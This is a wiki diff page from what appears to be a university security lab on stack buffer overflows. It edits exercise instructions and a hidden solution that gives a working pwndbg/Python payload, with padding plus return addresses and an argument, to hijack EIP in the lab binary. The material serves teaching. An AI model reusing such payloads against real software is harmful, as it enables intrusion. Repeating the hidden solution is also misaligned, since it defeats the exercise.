Differences
This shows you the differences between two versions of the page.
|
isc:labs:05 [2025/10/27 16:30] florin.stancu |
isc:labs:05 [2025/11/04 11:49] (current) david.gherghita [Exercises] |
||
|---|---|---|---|
| Line 168: | Line 168: | ||
| * Next, try to answer this question: how many bytes do I need to overflow until I get to the EIP saved by the ''call''er (also see the stack diagram above)? | * Next, try to answer this question: how many bytes do I need to overflow until I get to the EIP saved by the ''call''er (also see the stack diagram above)? | ||
| - | * Use either ''objdump -S'' or ''pwndbg> disass <name>'' on the //vulnerable function// to figure out the offset of the buffer variable from the EBP register using the assembly code; | + | * Use either ''objdump -S -M intel'' or ''pwndbg> disass <name>'' on the //vulnerable function// to figure out the offset of the buffer variable from the EBP register using the assembly code; |
| * In order to check if the answer is right, try to use an input of the following form: ''%%b"A" * N + b"\xEF\xCD\xAB\x98"%%''; this should make the program segfault with the end instruction pointer at ''0x98ABCDEF'' (readily visible in pwndbg's automatic registers printing); | * In order to check if the answer is right, try to use an input of the following form: ''%%b"A" * N + b"\xEF\xCD\xAB\x98"%%''; this should make the program segfault with the end instruction pointer at ''0x98ABCDEF'' (readily visible in pwndbg's automatic registers printing); | ||
| Line 177: | Line 177: | ||
| <solution -hidden> | <solution -hidden> | ||
| <code> | <code> | ||
| - | pwndbg> run "Salam" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 0x19 +b"\xb6\x91\x04\x08" + b"\x12\x93\x04\x08" + b"\xbe\xba\xfe\xca")') | + | pwndbg> run "Salam" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 0x19 +b"\xa6\x91\x04\x08" + b"\x0e\x93\x04\x08" + b"\xbe\xba\xfe\xca")') |
| </code> | </code> | ||
| </solution> | </solution> | ||
